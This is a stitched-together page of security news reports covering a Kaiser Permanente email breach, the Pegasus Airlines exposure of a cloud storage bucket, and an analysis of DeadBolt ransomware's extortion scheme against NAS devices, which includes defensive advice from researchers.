“The employee received additional training on safe email practices, and we are exploring other steps we can take to ensure incidents like this do not happen in the future,” Kaiser Permanente concluded.

The Daily Swig asked Kaiser to confirm that only one of its email accounts was affected by the breach and invited it to explain the root cause of the incident.

We also asked the healthcare provider to shed light on why it had decided against offering a year’s credit monitoring services at no charge to those impacted by the incident – a standard but by no means universal courtesy to victims of data breach incidents.

RELATED Turkish flight operator Pegasus Airlines suffers data breach

Kaiser Permanente data breach exposed healthcare records of 70,000 patients

Data protection regulator confirms sensitive information was leaked

Data protection regulator confirms sensitive information was leaked

  

Turkish flight operator Pegasus Airlines has suffered a data breach after an AWS cloud storage bucket was reportedly left unprotected.

The Electronic Flight Bag (EFB) information belonging to an unknown number of customers was reportedly stored in the open bucket, allowing access to sensitive information.

Turkey’s data protection agency has since confirmed that a leak has happened after it received a data breach notification from the company.

**Unauthorized access**

The statement from Kişisel Verileri Koruma Kurumu (Turkey’s Personal Data Protection Authority) confirmed that there was unauthorized access to certain information held by Pegasus.

A vulnerability that allowed the access was discovered on March 21, according to regulators, and was resolved on March 24.

According to the regulator, leaked information includes the names, surnames, phone numbers, e-mail addresses, titles, flight information of past journeys, flight locations, and photographs and signature images of some employees.

**Leaky bucket**

According to Safety Detectives, which disclosed the breach, almost 23 million files were found on the bucket, totaling around 6.5 TB of data.

A blog post reads: “The bucket’s information was linked to an EFB software developed by PegasusEFB that pilots use for aircraft navigation, takeoff/landing, refueling, safety procedures, and various other in-flight processes.

“PegasusEFB’s open bucket left data including flight charts, navigation materials, and crew PII accessible to anyone.

“The bucket also exposed the EFB software’s source code, which contained plain-text passwords and secret keys that someone could use to tamper with extra-sensitive files.”

Read more of the latest news about data breaches

“This exposure could impact the safety of every Pegasus passenger and crew member around the world,” according to researchers. “Affiliated airlines that are using PegasusEFB could also be affected.”

According to regulator, an investigation into the incident is ongoing. The Daily Swig has reached out to Pegasus Airlines for more information and will update this article accordingly.

YOU MAY LIKE India to introduce six-hour data breach notification rule

Turkish flight operator Pegasus Airlines suffers data breach

The innovative ransomware targets NAS devices, has a multitiered payment and extortion scheme as well as a flexible configuration, and takes a heavily automated approach.

The DeadBolt ransomware family is targeting QNAP and Asustor network-attached storage (NAS) devices by deploying a multitiered scheme aimed at both the vendors and their victims, and offering multiple cryptocurrency payment options.  

These factors make DeadBolt different from other NAS ransomware families and could be more problematic for its victims, according to an analysis from Trend Micro this week.

The ransomware uses a configuration file that will dynamically choose specific settings based on the vendor that it targets, making it scalable and easily adaptable to new campaigns and vendors, according to the researchers.

The payment schemes allow either the victim to pay for a decryption key, or for the vendor to pay for a decryption master key. This master key would theoretically work to decrypt data for all victims; however, the report notes less than 10% of DeadBolt victims actually paid the ransom.

"Even though the vendor master decryption key did not work in DeadBolt's campaigns, the concept of holding both the victim and the vendors ransom is an interesting approach," according to the report. "It's possible that this approach will be used in future attacks, especially since this tactic requires a low amount of effort on the part of a ransomware group."

Fernando Mercês, senior threat researcher at Trend Micro, points out that the actors also created a functional, nicely designed Web app to deal with ransom payments.

"They also know about the internals of QNAP and Asustor," he says. "Overall, it's an impressive job from a technical standpoint."

Mercês adds that ransomware actors in general are targeting NAS devices due to a combination of factors: low security, high availability, the high value of data, modern hardware, and common OS (Linux).

"It's like targeting Internet-facing Linux servers with all kinds of applications installed and no professional security in place," he says. “Additionally, these servers contain high-value data for the user. It sounds like the perfect target for ransomware."

For organizations to protect against attacks targeting internet-facing NAS devices, he says, they could use a VPN service, although the configuration may require a few technical skills.

"Suppose there's no other way other than exposing the NAS on the Internet," he says. "In that case, I'd recommend using strong passwords, 2FA, disabling/uninstalling all unused services and apps, and configuring a firewall in front of it to only allow the ports you want to access. This can be done in a router, for example."

Mercês notes that while it doesn't seem effective, it's interesting to see criminals trying to put some pressure on vendors to "fix the problem" for their customers.

"I think criminals thought the vendors would be worried about their image in front of their customers and maybe pay to get free decryptors for all of them," he says. "It could be interesting if customers started pushing vendors to pay on their behalf, but that didn't happen."

In May, QNAP warned its NAS devices are under active attack by DeadBolt ransomware, and in January, a report from attack surface solutions provider Censys.io noted that out of 130,000 QNAP NAS devices that were potential targets, 4,988 services showed signs of a DeadBolt infection.

Nicole Hoffman, senior cyber-threat intelligence analyst at Digital Shadows, a provider of digital risk protection solutions, points out that the DeadBolt ransomware operation is interesting for several reasons, including the fact that victims do not need to contact the threat actors at any time.

"With most ransomware groups, victims need to negotiate with the threat actors, who are often in different time zones," she says. “These interactions can add a significant amount of time to the recovery process and a level of uncertainty because the outcome could rely on the success of the interaction."

However, she notes that from a technical perspective, DeadBolt ransomware attacks are different from ransomware attacks that target many enterprise devices, as initial access is gained by exploiting vulnerabilities in unpatched Internet-facing NAS devices.

"There are no social engineering or lateral movement techniques required to carry out their objectives," Hoffman says. "The threat actors do not need a lot of time, tools, or money to carry out these opportunistic attacks."

Tag

#asus